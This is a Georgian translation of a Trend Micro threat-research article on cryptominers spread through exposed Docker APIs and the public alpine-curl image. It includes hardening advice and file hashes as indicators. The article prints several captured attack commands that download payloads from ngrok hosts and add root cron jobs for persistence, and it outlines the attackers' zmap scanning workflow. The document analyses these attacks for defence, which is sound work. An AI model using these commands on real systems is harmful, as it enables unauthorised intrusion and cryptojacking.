როგორ გამოიყენება არასაკუთრების Docker API და საზოგადოების საჯარო სურათები კრიპტოვალუტის მაინერების გასავრცელებლად

ჩვენ გავაანალიზეთ შეგროვებული მონაცემები honeypot კონტეინერების გამოყენებით, რომლებიც შევქმენით საფრთხეების თვალყურის დევნებისთვის. და ჩვენ აღმოვაჩინეთ მნიშვნელოვანი აქტივობა არასასურველი ან არაავტორიზებული კრიპტოვალუტის მაინერებისგან, რომლებიც განლაგდნენ თაღლითური კონტეინერების სახით Docker Hub-ზე საზოგადოების მიერ გამოქვეყნებული სურათის გამოყენებით. სურათი გამოიყენება როგორც სერვისის ნაწილი, რომელიც აწვდის მავნე კრიპტოვალუტის მაინერებს.

გარდა ამისა, დაინსტალირებულია ქსელებთან მუშაობის პროგრამები ღია მეზობელ კონტეინერებსა და აპლიკაციებში შესაღწევად.

ჩვენ ვტოვებთ ჩვენს honeypot-ებს ისე, როგორც არის, ანუ ნაგულისხმევი პარამეტრებით, უსაფრთხოების ზომების ან დამატებითი პროგრამული უზრუნველყოფის შემდგომი ინსტალაციის გარეშე. გთხოვთ გაითვალისწინოთ, რომ Docker-ს აქვს რეკომენდაციები თავდაპირველი დაყენებისთვის, რათა თავიდან აიცილოთ შეცდომები და მარტივი დაუცველობა. მაგრამ გამოყენებული honeypots არის კონტეინერები, რომლებიც შექმნილია კონტეინერიზაციის პლატფორმაზე მიმართული თავდასხმების აღმოსაჩენად და არა კონტეინერების შიგნით არსებული აპლიკაციებისთვის.

აღმოჩენილი მავნე აქტივობა ასევე აღსანიშნავია, რადგან ის არ საჭიროებს დაუცველობას და ასევე დამოუკიდებელია Docker-ის ვერსიისგან. არასწორად კონფიგურირებული და, შესაბამისად, ღია კონტეინერის სურათის პოვნა არის ყველაფერი, რაც თავდამსხმელებს სჭირდებათ მრავალი ღია სერვერის დასაინფიცირებლად.

დაუხურავი Docker API მომხმარებელს საშუალებას აძლევს შეასრულოს ფართო სპექტრი გუნდები, მათ შორის გაშვებული კონტეინერების სიის მიღება, მორების მიღება კონკრეტული კონტეინერიდან, დაწყება, გაჩერება (მათ შორის იძულებითი) და ახალი კონტეინერის შექმნაც კი კონკრეტული სურათიდან მითითებული პარამეტრებით.

მარცხნივ არის მავნე პროგრამის მიწოდების მეთოდი. მარჯვნივ არის თავდამსხმელის გარემო, რომელიც საშუალებას იძლევა სურათების დისტანციურად გადატანა.

განაწილება ქვეყნების მიხედვით 3762 ღია Docker API. შოდანის ძიების საფუძველზე დათარიღებული 12.02.2019/XNUMX/XNUMX

თავდასხმის ჯაჭვისა და დატვირთვის ვარიანტები

მავნე აქტივობა გამოვლინდა არა მხოლოდ honeypots-ის დახმარებით. Shodan-ის მონაცემები აჩვენებს, რომ გამოვლენილი Docker API-ების რაოდენობა (იხ. მეორე გრაფიკი) გაიზარდა მას შემდეგ, რაც ჩვენ გამოვიკვლიეთ არასწორად კონფიგურირებული კონტეინერი, რომელიც გამოიყენება როგორც ხიდი Monero კრიპტოვალუტის მაინინგის პროგრამული უზრუნველყოფის გამოსაყენებლად. გასული წლის ოქტომბერში (2018, მიმდინარე მონაცემები შეგიძლიათ ასე გამოიყურებოდეთ დაახლ. მთარგმნელი) იყო მხოლოდ 856 ღია API.

Honeypot-ის ჟურნალების გამოკვლევამ აჩვენა, რომ კონტეინერის გამოსახულების გამოყენება ასევე დაკავშირებული იყო გამოყენებასთან ნგროკ, ხელსაწყო უსაფრთხო კავშირების დამყარებისთვის ან ტრაფიკის გადამისამართებისთვის საჯაროდ ხელმისაწვდომი წერტილებიდან მითითებულ მისამართებზე ან რესურსებზე (მაგალითად, localhost). ეს საშუალებას აძლევს თავდამსხმელებს დინამიურად შექმნან URL-ები ღია სერვერზე დატვირთვის მიწოდებისას. ქვემოთ მოცემულია კოდის მაგალითები ჟურნალებიდან, რომლებიც აჩვენებს ngrok სერვისის ბოროტად გამოყენებას:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

როგორც ხედავთ, ატვირთული ფაილები იტვირთება მუდმივად ცვალებადი URL-ებიდან. ამ URL-ებს აქვს ვადის გასვლის მოკლე თარიღი, ამიტომ ანაზღაურებადი დატვირთვები ვერ ჩამოიტვირთება ვარგისიანობის ვადის გასვლის შემდეგ.

არსებობს ორი დატვირთვის ვარიანტი. პირველი არის კომპილირებული მაინერი ELF ფორმატში Linux (იდენტიფიცირებულია როგორც Coinminer.SH.MALXMR.ATNO), რომელიც უკავშირდება მაინინგის პულს. მეორე არის სკრიპტი (TrojanSpy.SH.ZNETMAP.A), რომელიც შექმნილია ქსელის დიაპაზონების სკანირებისთვის გამოყენებული გარკვეული ქსელური ინსტრუმენტების მოსაპოვებლად და შემდეგ ახალი სამიზნეების მოსაძებნად.

წვეთოვანი სკრიპტი ადგენს ორ ცვლადს, რომლებიც შემდეგ გამოიყენება კრიპტოვალუტის მაინერის განსათავსებლად. HOST ცვლადი შეიცავს URL-ს, სადაც განლაგებულია მავნე ფაილები, ხოლო RIP ცვლადი არის ფაილის სახელი (ფაქტობრივად, ჰეში), რომელიც უნდა განთავსდეს მაინერისთვის. HOST ცვლადი იცვლება ყოველ ჯერზე, როცა ჰეშის ცვლადი იცვლება. სკრიპტი ასევე ცდილობს შეამოწმოს, რომ არცერთი სხვა კრიპტოვალუტის მაინერი არ მუშაობს თავდასხმულ სერვერზე.

HOST და RIP ცვლადების მაგალითები, ასევე კოდის ნაწყვეტი, რომელიც გამოიყენება იმის შესამოწმებლად, რომ სხვა მაინერები არ მუშაობენ

მაინერის გაშვებამდე მას nginx-ად ცვლიან. ამ სკრიპტის სხვა ვერსიები მაინერს გარემოში შესაძლოა არსებული სხვა ლეგიტიმური სერვისებით ცვლიან. Linuxეს, როგორც წესი, საკმარისია გაშვებული პროცესების სიაში შემოწმების გვერდის ავლით.

საძიებო სკრიპტს ასევე აქვს ფუნქციები. ის მუშაობს იმავე URL სერვისით, რათა განათავსოს საჭირო ინსტრუმენტები. მათ შორის არის zmap ორობითი, რომელიც გამოიყენება ქსელების სკანირებისთვის და ღია პორტების სიის მისაღებად. სკრიპტი ასევე იტვირთება სხვა ორობითი, რომელიც გამოიყენება აღმოჩენილ სერვისებთან ურთიერთობისთვის და მათგან ბანერების მისაღებად, რათა დადგინდეს დამატებითი ინფორმაცია ნაპოვნი სერვისის შესახებ (მაგალითად, მისი ვერსია).

სკრიპტი ასევე წინასწარ განსაზღვრავს ზოგიერთი ქსელის დიაპაზონს სკანირებისთვის, მაგრამ ეს დამოკიდებულია სკრიპტის ვერსიაზე. ის ასევე ადგენს სამიზნე პორტებს სერვისებიდან - ამ შემთხვევაში, Docker - სკანირების დაწყებამდე.

პოტენციური სამიზნეების პოვნის შემდეგ, ბანერები ავტომატურად იშლება მათგან. სკრიპტი ასევე ფილტრავს სამიზნეებს იმ სერვისების, აპლიკაციების, კომპონენტების ან პლატფორმების მიხედვით, რომლებიც მას აინტერესებს: Redis, Jenkins, Drupal, MODX, კუბერნეტის ოსტატი, Docker 1.16 კლიენტი და Apache CouchDB. თუ დასკანირებული სერვერი ემთხვევა რომელიმე მათგანს, ის ინახება ტექსტურ ფაილში, რომელიც მოგვიანებით თავდამსხმელებს შეუძლიათ გამოიყენონ შემდგომი ანალიზისა და ჰაკერებისთვის. ეს ტექსტური ფაილები ატვირთულია თავდამსხმელთა სერვერებზე დინამიური ბმულების საშუალებით. ანუ, თითოეული ფაილისთვის გამოიყენება ცალკე URL, რაც ნიშნავს, რომ შემდგომი წვდომა რთულია.

თავდასხმის ვექტორი არის Docker გამოსახულება, როგორც ჩანს კოდის მომდევნო ორ ნაწილში.

ზედა არის ლეგიტიმურ სერვისზე სახელის გადარქმევა, ხოლო ბოლოში არის zmap-ის გამოყენება ქსელების სკანირებისთვის

ზედა არის წინასწარ განსაზღვრული ქსელის დიაპაზონები, ბოლოში არის კონკრეტული პორტები სერვისების საძიებლად, მათ შორის Docker

სკრინშოტი აჩვენებს, რომ alpine-curl სურათი გადმოწერილია 10 მილიონზე მეტჯერ

ალპურზე დაფუძნებული Linux და curl, რესურსეფექტური CLI ინსტრუმენტი ფაილების სხვადასხვა პროტოკოლით გადასატანად, შეიძლება კომპილირებული იყოს. დოკერის სურათი. როგორც წინა სურათზე ხედავთ, ეს სურათი უკვე გადმოწერილია 10 მილიონზე მეტჯერ. ჩამოტვირთვების დიდი რაოდენობა შეიძლება ნიშნავდეს ამ სურათის, როგორც შესვლის პუნქტის გამოყენებას; ეს სურათი განახლდა ექვს თვეზე მეტი ხნის წინ; მომხმარებლები არც ისე ხშირად ჩამოტვირთავდნენ სხვა სურათებს ამ საცავიდან. დოკერში შესვლის წერტილი - ინსტრუქციების ნაკრები, რომელიც გამოიყენება კონტეინერის გასაშვებად კონფიგურაციისთვის. თუ შესვლის წერტილის პარამეტრები არასწორია (მაგალითად, კონტეინერი ღიაა ინტერნეტიდან), სურათი შეიძლება გამოყენებულ იქნას როგორც თავდასხმის ვექტორი. თავდამსხმელებს შეუძლიათ გამოიყენონ ის ტვირთის გადასატანად, თუ აღმოაჩენენ არასწორ კონფიგურაციას ან ღია კონტეინერს, რომელიც მხარდაჭერის გარეშე დარჩა.

მნიშვნელოვანია აღინიშნოს, რომ ეს სურათი (alpine-curl) თავისთავად არ არის მავნე, მაგრამ როგორც ზემოთ ხედავთ, მისი გამოყენება შესაძლებელია მავნე ფუნქციების შესასრულებლად. მსგავსი Docker სურათები ასევე შეიძლება გამოყენებულ იქნას მავნე მოქმედებების შესასრულებლად. ჩვენ დავუკავშირდით Docker-ს და ვიმუშავეთ მათთან ამ საკითხზე.

რეკომენდაციები

არასწორი პარამეტრი ნაშთები მუდმივი პრობლემა მრავალი კომპანიისთვის, განსაკუთრებით მათთვის, ვინც ახორციელებს DevOps, ორიენტირებულია სწრაფ განვითარებასა და მიწოდებაზე. ყველაფერს ამძიმებს აუდიტისა და მონიტორინგის წესების დაცვის აუცილებლობა, მონაცემთა კონფიდენციალურობის მონიტორინგის აუცილებლობა, ასევე მათი შეუსრულებლობის უზარმაზარი ზიანი. უსაფრთხოების ავტომატიზაციის ჩართვა განვითარების სასიცოცხლო ციკლში არა მხოლოდ გეხმარებათ იპოვოთ უსაფრთხოების ხვრელები, რომლებიც სხვაგვარად შეიძლება შეუმჩნეველი დარჩეს, არამედ ასევე დაგეხმარებათ შეამციროთ არასაჭირო დატვირთვა, როგორიცაა დამატებითი პროგრამული უზრუნველყოფის გაშვება თითოეული აღმოჩენილი დაუცველობისთვის ან არასწორი კონფიგურაციისთვის აპლიკაციის განლაგების შემდეგ.

ამ სტატიაში განხილული ინციდენტი ხაზს უსვამს უსაფრთხოების თავიდანვე გათვალისწინების აუცილებლობას, მათ შორის შემდეგ რეკომენდაციებს:

• სისტემის ადმინისტრატორებისა და დეველოპერებისთვის: ყოველთვის შეამოწმეთ თქვენი API პარამეტრები, რათა დარწმუნდეთ, რომ ყველაფერი კონფიგურირებულია მხოლოდ კონკრეტული სერვერის ან შიდა ქსელის მოთხოვნების მისაღებად.
• დაიცავით მინიმალური უფლებების პრინციპი: დარწმუნდით, რომ კონტეინერის სურათები ხელმოწერილი და დამოწმებულია, შეზღუდეთ წვდომა კრიტიკულ კომპონენტებზე (კონტეინერის გაშვების სერვისი) და დაამატეთ დაშიფვრა ქსელის კავშირებს.
• Გაყოლა რეკომენდაციები და ჩართეთ უსაფრთხოების მექანიზმები, მაგ. დოკერისგან და ჩაშენებული უსაფრთხოების მახასიათებლები.
• გამოიყენეთ გაშვების დროისა და სურათების ავტომატური სკანირება, რათა მიიღოთ დამატებითი ინფორმაცია კონტეინერში მიმდინარე პროცესების შესახებ (მაგალითად, გაყალბების აღმოსაჩენად ან მოწყვლადობის მოსაძებნად). აპლიკაციის კონტროლი და მთლიანობის მონიტორინგი გვეხმარება სერვერების, ფაილების და სისტემის არეებში არანორმალური ცვლილებების თვალყურის დევნებაში.

Trendmicro ეხმარება DevOps-ის გუნდებს უსაფრთხოდ აშენებაში, სწრაფად გაშვებასა და გაშვებაში სადმე. Trend Micro ჰიბრიდული ღრუბლოვანი უსაფრთხოება უზრუნველყოფს მძლავრ, გამარტივებულ და ავტომატიზირებულ უსაფრთხოებას ორგანიზაციის DevOps მილსადენზე და უზრუნველყოფს მრავალი საფრთხის დაცვას XGen ფიზიკური, ვირტუალური და ღრუბლოვანი დატვირთვის დასაცავად გაშვების დროს. ის ასევე ამატებს კონტეინერის უსაფრთხოებას ღრმა უსაფრთხოება и ღრმა უსაფრთხოების ჭკვიანი შემოწმება, რომელიც სკანირებს Docker კონტეინერის სურათებს მავნე პროგრამებისა და დაუცველობისთვის განვითარების მილსადენის ნებისმიერ წერტილში, რათა თავიდან აიცილოს საფრთხეები მათ განლაგებამდე.

კომპრომისის ნიშნები

დაკავშირებული ჰეშები:

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

წლის დოკერის ვიდეო კურსი პრაქტიკოსი დინამიკები აჩვენებენ, თუ რა პარამეტრები უნდა გაკეთდეს პირველ რიგში, რათა მინიმუმამდე დაიყვანოთ ალბათობა ან მთლიანად თავიდან აიცილოთ ზემოთ აღწერილი სიტუაციის წარმოშობა. ხოლო 19-21 აგვისტოს ონლაინ ინტენსიურად DevOps Tools & Cheats უსაფრთხოების ამ და მსგავსი პრობლემების განხილვა შეგიძლიათ კოლეგებთან და პრაქტიკოს მასწავლებლებთან მრგვალ მაგიდაზე, სადაც ყველას შეუძლია ისაუბროს და მოუსმინოს გამოცდილი კოლეგების ტკივილებს და წარმატებებს.

წყარო: www.habr.com